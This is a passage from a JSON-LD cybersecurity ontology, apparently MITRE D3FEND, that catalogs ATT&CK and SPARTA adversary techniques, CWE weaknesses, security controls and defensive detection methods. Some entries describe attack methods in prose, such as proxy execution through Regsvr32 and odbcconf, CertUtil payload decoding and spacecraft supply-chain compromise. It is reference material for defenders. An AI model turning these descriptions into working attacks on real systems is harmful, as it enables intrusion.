        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "rdfs:label": "SI-4(2)"
    },
    {
      "@id": "d3f:CWE-350",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-350",
      "d3f:definition": "The product performs reverse DNS resolution on an IP address to obtain the hostname and make a security decision, but it does not properly ensure that the IP address is truly associated with the hostname.",
      "rdfs:label": "Reliance on Reverse DNS Resolution for a Security-Critical Action",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-290"
        },
        {
          "@id": "d3f:CWE-807"
        }
      ]
    },
    {
      "@id": "d3f:T1053.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1053.007",
      "d3f:definition": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.",
      "rdfs:label": "Container Orchestration Job",
      "rdfs:subClassOf": {
        "@id": "d3f:T1053"
      }
    },
    {
      "@id": "d3f:SoftwareArtifactServer",
      "@type": "owl:Class",
      "d3f:definition": "A software artifact server provides access to the software artifacts in a software repository. A software repository, or \"repo\" for short, is a storage location for software packages. Often a table of contents is stored, as well as metadata. Repositories group packages. Sometimes the grouping is for a programming language, such as CPAN for the Perl programming language, sometimes for an entire operating system, sometimes the license of the contents is the criteria. At client side, a package manager helps installing from and updating the repositories.",
      "rdfs:label": "Software Artifact Server",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Software_repository"
        },
        {
          "@id": "dbr:Artifact_(software_development)"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ArtifactServer"
      }
    },
    {
      "@id": "d3f:T1588.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.005",
      "d3f:definition": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)",
      "rdfs:label": "Exploits",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:CWE-318",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-318",
      "d3f:definition": "The product stores sensitive information in cleartext in an executable.",
      "rdfs:label": "Cleartext Storage of Sensitive Information in Executable",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:GetSystemNetworkConfigValue",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Get System Network Config Value",
      "rdfs:subClassOf": {
        "@id": "d3f:GetSystemConfigValue"
      }
    },
    {
      "@id": "d3f:HostGroup",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Host"
      },
      "d3f:definition": "A collection of Hosts used to allow operations such as access control to be applied to the entire group.",
      "rdfs:label": "Host Group",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessControlGroup"
        },
        {
          "@id": "_:N13e651949bba431a8f200531c300e9cc"
        }
      ]
    },
    {
      "@id": "_:N13e651949bba431a8f200531c300e9cc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:T1070.010",
      "@type": "owl:Class",
      "d3f:attack-id": "T1070.010",
      "d3f:definition": "Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.",
      "rdfs:label": "Relocate Malware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1070"
      }
    },
    {
      "@id": "d3f:IA-0008.03",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0008.03",
      "d3f:definition": "Adversaries leverage counterspace platforms to create conditions under which initial execution becomes possible or to impose effects directly. Electronic warfare systems can jam or spoof links so that the target shifts to contingency channels or accepts crafted navigation/control signals; directed-energy systems can dazzle sensors or upset electronics, shaping mode transitions and autonomy responses; kinetic or contact-capable systems can enable mechanical interaction that exposes maintenance or debug paths. In each case, the counterspace asset is an external actor-controlled node that interacts with the spacecraft outside authorized ground pathways. Initial access may be the immediate result of accepted spoofed traffic, or it may be secondary, arising when the target enters states with broader command acceptance, alternative receivers, or service interfaces that the adversary can then exploit.",
      "rdfs:label": "ASAT/Counterspace Weapon - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0008/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0008"
      },
      "skos:prefLabel": "ASAT/Counterspace Weapon"
    },
    {
      "@id": "rdfs:isDefinedBy",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": "isDefinedBy"
    },
    {
      "@id": "d3f:CWE-1341",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1341",
      "d3f:definition": "The product attempts to close or release a resource or handle more than once, without any successful open between the close operations.",
      "rdfs:label": "Multiple Releases of Same Resource or Handle",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-675"
      }
    },
    {
      "@id": "d3f:T0827",
      "@type": "owl:Class",
      "d3f:attack-id": "T0827",
      "d3f:definition": "Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)",
      "rdfs:label": "Loss of Control - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Loss of Control"
    },
    {
      "@id": "d3f:T1512",
      "@type": "owl:Class",
      "d3f:attack-id": "T1512",
      "d3f:definition": "An adversary can leverage a device’s cameras to gather information by capturing video recordings. Images may also be captured, potentially in specified intervals, in lieu of video files.",
      "rdfs:label": "Video Capture - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Video Capture"
    },
    {
      "@id": "d3f:ServiceInstallationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the installation or registration of a service application within the system, enabling it to provide background or reusable functionality.",
      "rdfs:label": "Service Installation Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationInstallationEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        }
      ]
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-009%3ACertUtilWithDecodeArgument_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-009/"
      },
      "d3f:kb-abstract": "CertUtil.exe may be used to encode and decode a file, including PE and script code. Encoding will convert a file to base64 with -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- tags. Malicious usage will include decoding an encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - encodehex and decodehex. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-009: CertUtil With Decode Argument",
      "rdfs:label": "Reference - CAR-2021-05-009: CertUtil With Decode Argument - MITRE"
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingThreatsUsingPassiveClusterMapping_VectraNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160149936A1"
      },
      "d3f:kb-abstract": "An approach for detecting network threats is disclosed, that may involve receiving network traffic, plotting the network traffic in a n-dimensional feature space to form a network map, generating a client signature at least by placing new client points in the map, setting a threshold, and generating an alarm if one or more client activity points exceed the threshold. In some embodiments, the network map and the client signature are updated using sliding windows and distance calculations.",
      "d3f:kb-author": "David Lopes PEGNA; Nicolas Beauchesne",
      "d3f:kb-mitre-analysis": "This patent describes detecting network threats by first passively collecting network traffic and storing it for processing. The stored network traffic data is used to map network events to create a cluster map. Events are network activity associated with clients, servers, or control modules such as a Kerberos Domain Controller (KDC); account information; services accessed by the client; or the number of times a service is accessed. Events that exceed a threshold from a center of gravity point of a cluster are identified as suspicious activity and an alert is generated.",
      "d3f:kb-organization": "Vectra Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProtocolMetadataAnomalyDetection"
      },
      "d3f:kb-reference-title": "Method and system for detecting threats using passive cluster mapping",
      "rdfs:label": "Reference - Method and system for detecting threats using passive cluster mapping - Vectra Networks Inc"
    },
    {
      "@id": "d3f:title",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "A name given to the resource.",
      "rdfs:label": {
        "@language": "en",
        "@value": "title"
      },
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:broader-transitive",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x broader-transitive y: The entity x represents a more general concept than entity y, including indirect or hierarchical relationships where x encompasses y through intermediate entities.",
      "rdfs:label": "broader-transitive",
      "rdfs:subPropertyOf": {
        "@id": "d3f:semantic-relation"
      }
    },
    {
      "@id": "d3f:T1213.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1213.005",
      "d3f:definition": "Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information.",
      "rdfs:label": "Messaging Applications",
      "rdfs:subClassOf": {
        "@id": "d3f:T1213"
      }
    },
    {
      "@id": "d3f:T1218.010",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.010",
      "d3f:definition": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)",
      "rdfs:label": "Regsvr32",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:Semi-supervisedSelf-training",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSST",
      "d3f:definition": "Self-training is the procedure in which a supervised method for classification or regression is modified to work in a semi-supervised manner, taking advantage of labeled and unlabeled data.",
      "d3f:kb-article": "## References\nAltexSoft. (n.d.). Semi-Supervised Learning: A Technical Guide with Python Examples. [Link](https://www.altexsoft.com/blog/semi-supervised-learning/#:~:text=One%20of%20the%20simplest%20examples,of%20labeled%20and%20unlabeled%20data.)",
      "rdfs:label": "Semi-supervised Self-training",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-supervisedWrapperMethod"
      }
    },
    {
      "@id": "d3f:ArtificialNeuralNetClassification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-annotation": "Classification ANNs seek to classify an observation as belonging to some discrete class as a function of the inputs. The input features (independent variables) can be categorical or numeric types; however, we require a categorical feature as the dependent variable.",
      "d3f:d3fend-id": "D3A-ANNC",
      "d3f:kb-article": "## References\nANN Classification. [Link](http://uc-r.github.io/ann_classification).",
      "rdfs:label": "Artificial Neural Network Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:Classification"
      }
    },
    {
      "@id": "d3f:CCI-000772_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uses multifactor authentication for network access to non-privileged accounts where one of the factors is provided by a device separate from the information system being accessed.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000772"
    },
    {
      "@id": "d3f:d3fend-external-control-data-property",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": "d3fend-external-control-data-property",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:d3fend-catalog-data-property"
        },
        {
          "@id": "d3f:d3fend-data-property"
        }
      ]
    },
    {
      "@id": "d3f:DomainNameReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DomainNameReputationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:DomainName"
      },
      "d3f:d3fend-id": "D3-DNRA",
      "d3f:definition": "Analyzing the reputation of a domain name.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-Database_for_receiving_storing_and_compiling_information_about_email_messages"
        },
        {
          "@id": "d3f:Reference-Finding_phishing_sites"
        }
      ],
      "rdfs:label": "Domain Name Reputation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierReputationAnalysis"
        },
        {
          "@id": "_:Na9354d1bc97544599598e945b3f3eb13"
        }
      ]
    },
    {
      "@id": "_:Na9354d1bc97544599598e945b3f3eb13",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainName"
      }
    },
    {
      "@id": "d3f:RemoteTerminalSessionDetection",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RemoteTerminalSessionDetection"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-RTSD",
      "d3f:definition": "Detection of an unauthorized remote live terminal console session by examining network traffic to a network host.",
      "d3f:kb-article": "## How it works\nAn external attacker takes remote control of a host inside a company or organization's network and manually directs offensive techniques. Nonstandard terminal sessions and abnormal behaviors are analyzed in this technique. Abnormal behavior detection includes analysis of user input patterns in the real-time session, keyboard output and packet inspection.\n\n### Network Traffic Inspection\nNetwork traffic from internal hosts is the main concern and focus for the traffic inspection. The network traffic is collected into inspection groups. The groups of traffic are assembled into distinct pair flows (outbound/inbound) and the pair flows are further divided into sessions. Only sessions originated inside of the network are considered for the inspection. Traffic inspection includes analysis to determine if a human is involved in the session exchanges. Time-based statistics are captured for each session being analyzed by the detection engine.\n\n### Algorithm Analysis Description\nAnalysis algorithms look for patterns in the network traffic captured from the session data.  A detection engine groups the session traffic data, between the hosts, into rapid exchange instances. Analysis of rapid exchange traffic patterns can lead to the discovery of abnormal behavior which is indicative of a compromised internal host. The analysis algorithms look for patterns in the traffic which correlate to known activity (e.g., relay attacks, bot activity, bitcoin mining). \nSome metrics used during inspection include the following.\n\n* Number of rapid-exchange instances\n* Time interval between packets\n* Fixed cadence of traffic\n* Rhythm and direction of the initiation of instances\n* Volume of data flowing from internal to external controlling host\n* Data transfer characteristics\n* Variability in length of silent periods\n\n## Considerations\n* Full packet capture is required which can be process intensive to analyze\n* Attackers that move low and slow may blend in with existing traffic resulting in false negatives",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndSystemForDetectingExternalControlOfCompromisedHosts_VECTRANETWORKSInc"
        },
        {
          "@id": "d3f:Reference-RDPConnectionDetection_MITRE"
        },
        {
          "@id": "d3f:Reference-RemoteDesktopLogon_MITRE"
        }
      ],
      "rdfs:label": "Remote Terminal Session Detection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N31c69b15d03041e5bdc8bd16936d6138"
        }
      ]
    },
    {
      "@id": "_:N31c69b15d03041e5bdc8bd16936d6138",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1587.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1587.004",
      "d3f:definition": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)",
      "rdfs:label": "Exploits",
      "rdfs:subClassOf": {
        "@id": "d3f:T1587"
      }
    },
    {
      "@id": "d3f:NTPSymmetricActiveExchangeEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an NTP peer operating in symmetric active mode initiates clock synchronization messages to a peer in symmetric passive mode, enabling time synchronization between equal-status systems.",
      "rdfs:label": "NTP Symmetric Active Exchange Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NTPEvent"
      }
    },
    {
      "@id": "d3f:IA-0012",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0012",
      "d3f:definition": "Assembly, Test, and Launch Operation (ATLO) concentrates people, tools, and authority while components first exchange real traffic across flight interfaces. Test controllers, EGSE, simulators, flatsats, loaders, and data recorders connect to the same buses and command paths that will exist on orbit. Threat actors exploit this density and dynamism: compromised laptops or transient cyber assets push images and tables; lab networks bridge otherwise separate enclaves; vendor support accounts move software between staging and flight hardware; and “golden” artifacts created or modified in ATLO propagate into the as-flown baseline. Malware can traverse shared storage and scripting environments, ride update/checklist execution, or piggyback on protocol translators and gateways used to stimulate subsystems. Because ATLO often introduces late firmware loads, key/counter initialization, configuration freezes, and full-system rehearsals, a single well-placed change can yield first execution on multiple devices and persist into LEOP.",
      "rdfs:label": "Assembly, Test, and Launch Operation Compromise - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0012/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Assembly, Test, and Launch Operation Compromise"
    },
    {
      "@id": "d3f:CCI-001125_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces adherence to protocol format.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001125"
    },
    {
      "@id": "d3f:T1526",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1526",
      "d3f:definition": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.",
      "d3f:reads": {
        "@id": "d3f:CloudConfiguration"
      },
      "rdfs:label": "Cloud Service Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N41665a1830c64cd8807fb7b97f9aa18b"
        }
      ]
    },
    {
      "@id": "_:N41665a1830c64cd8807fb7b97f9aa18b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:CCI-002467_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system performs data integrity verification on the name/address resolution responses the system receives from authoritative sources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002467"
    },
    {
      "@id": "d3f:WindowsNtCreateNamedPipeFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates Named Pipe File Object.",
      "rdfs:label": "Windows NtCreateNamedPipeFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:Reference-ProtectingAgainstDistributedNetworkFloodAttacks-JuniperNetworksInc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8789173B2"
      },
      "d3f:kb-abstract": "A network security device performs a three-stage analysis of traffic to identify malicious clients. In one example, a device includes an attack detection module to, during a first stage, monitor network connections to a protected network device, during a second stage, to monitor a plurality of types of transactions for the plurality of network sessions when a parameter for the connections exceeds a connection threshold, and during a third stage, to monitor communications associated with network addresses from which transactions of the at least one of type of transactions originate when a parameter associated with the at least one type of transactions exceeds a transaction-type threshold. The device executes a programmed action with respect to at least one of the network addresses when the transactions of the at least one of the plurality of types of transactions originating from the at least one network address exceeds a client-transaction threshold.",
      "d3f:kb-author": "Krishna Narayanaswamy, Bryan Burns, Venkata Rama Raju Manthena",
      "d3f:kb-organization": "Juniper Networks Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundSessionVolumeAnalysis"
      },
      "d3f:kb-reference-title": "Protecting against distributed network flood attacks",
      "rdfs:label": "Reference - Protecting against distributed network flood attacks - Juniper Networks Inc."
    },
    {
      "@id": "d3f:T1163",
      "@type": "owl:Class",
      "d3f:attack-id": "T1163",
      "d3f:definition": "During the boot process, macOS executes <code>source /etc/rc.common</code>, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1037.004",
      "rdfs:label": "Rc.common",
      "rdfs:seeAlso": {
        "@id": "d3f:T1037.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:T1605",
      "@type": "owl:Class",
      "d3f:attack-id": "T1605",
      "d3f:definition": "Adversaries may use built-in command-line interfaces to interact with the device and execute commands. Android provides a bash shell that can be interacted with over the Android Debug Bridge (ADB) or programmatically using Java’s `Runtime` package. On iOS, adversaries can interact with the underlying runtime shell if the device has been jailbroken.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1623.001",
      "rdfs:label": "Command-Line Interface - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1623.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileExecutionTechnique"
      },
      "skos:prefLabel": "Command-Line Interface"
    },
    {
      "@id": "d3f:HTTPSURL",
      "@type": [
        "owl:NamedIndividual",
        "d3f:URL"
      ],
      "rdfs:label": "HTTPS URL"
    },
    {
      "@id": "d3f:TrustStore",
      "@type": "owl:Class",
      "d3f:definition": "Stores public information necessary to determine if another party can be trusted.",
      "rdfs:label": "Trust Store",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Public_key_certificate"
        },
        {
          "@id": "https://www.educative.io/edpresso/keystore-vs-truststore"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:Signal",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In electronics and telecommunications, signal refers to any time-varying voltage, current, or electromagnetic wave that carries information.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Signal"
      },
      "rdfs:label": "Signal",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalArtifact"
        },
        {
          "@id": "_:N3345672d4d3e44bd9f2db475ed5a6ebd"
        }
      ]
    },
    {
      "@id": "_:N3345672d4d3e44bd9f2db475ed5a6ebd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:carries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:T1218.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.008",
      "d3f:definition": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.",
      "rdfs:label": "Odbcconf",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:REC-0008",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0008",
      "d3f:definition": "Threat actors map the end-to-end pathway by which hardware, software, data, and people move from design through AIT, launch, and on-orbit sustainment. They catalog manufacturers and lots, test and calibration houses, logistics routes and waypoints, integrator touchpoints, key certificates and tooling, update and key-loading procedures, and who holds custody at each handoff. They correlate this with procurement artifacts, SBOMs, BOMs, and service contracts to locate where trust is assumed rather than verified. Particular attention falls on exceptions, engineering builds, rework tickets, advance replacements, depot repairs, and urgent field updates, because controls are frequently relaxed there. The result is a prioritized list of choke points (board fabrication, FPGA bitstream signing, image repositories, CI/CD runners, cloud artifact stores, freight forwarders) where compromise yields outsized effect.",
      "rdfs:label": "Gather Supply Chain Information - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0008/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Supply Chain Information"
    },
    {
      "@id": "d3f:DynamicAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DynamicAnalysis"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:DocumentFile"
        },
        {
          "@id": "d3f:ExecutableFile"
        }
      ],
      "d3f:d3fend-id": "D3-DA",
      "d3f:definition": "Executing or opening a file in a synthetic \"sandbox\" environment to determine if the file is a malicious program or if the file exploits another program such as a document reader.",
      "d3f:kb-article": "## How it works\nAnalyzing the interaction of a piece of code with a system while the code is being executed in a controlled environment such as a sandbox, virtual machine, or simulator. This exposes the natural behavior of the piece of code without requiring the code to be disassembled.\n\n## Considerations\n * Malware often detects a fake environment, then changes its behavior accordingly. For example, it could detect that the system clock is being sped up in an effort to get it to execute commands that it would normally only execute at a later time, or that the hardware manufacturer of the machine is a virtualization provider.\n * Malware can attempt to determine if it is being debugged, and change its behavior accordingly.\n * For maximum fidelity, the simulated and real environments should be as similar as possible because the malware could perform differently in different environments.\n * Sometimes the malware behavior is triggered only under certain conditions (on a specific system date, after a certain time, or after it is sent a specific command) and can't be detected through a short execution in a virtual environment.\n\n## Implementations\n* Cuckoo Sandbox",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MalwareAnalysisSystem_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-UseOfAnApplicationControllerToMonitorAndControlSoftwareFileAndApplicationEnvironments_SophosLtd"
        }
      ],
      "d3f:synonym": [
        "Malware Detonation",
        "Malware Sandbox"
      ],
      "rdfs:label": "Dynamic Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "_:N3eeb73bccd964544829df9398da86f8a"
        },
        {
          "@id": "_:Nc8d329a7d2f443fcb936a1c099a33ba5"
        }
      ]
    },
    {
      "@id": "_:N3eeb73bccd964544829df9398da86f8a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DocumentFile"
      }
    },
    {
      "@id": "_:Nc8d329a7d2f443fcb936a1c099a33ba5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:CycleGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CYC",
      "d3f:definition": "The Cycle Generative Adversarial Network (CycleGAN) is an approach to training a deep convolutional neural network for image-to-image translation tasks by mapping between input and output images using unpaired dataset.",
      "d3f:kb-article": "## References\nEsri. (n.d.). How CycleGAN Works. [Link](https://developers.arcgis.com/python/guide/how-cyclegan-works/)",
      "rdfs:label": "CycleGAN",
      "rdfs:subClassOf": {
        "@id": "d3f:Image-to-ImageTranslationGAN"
      }
    },
    {
      "@id": "d3f:RDPConnectRequestEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an RDP client sends a connection request specifying session parameters, such as display settings, compression preferences, and security requirements, to prepare for an interactive session.",
      "rdfs:label": "RDP Connect Request Event",
      "rdfs:subClassOf": {
        "@id": "d3f:RDPEvent"
      }
    },
    {
      "@id": "d3f:EncoderApplication",
      "@type": "owl:Class",
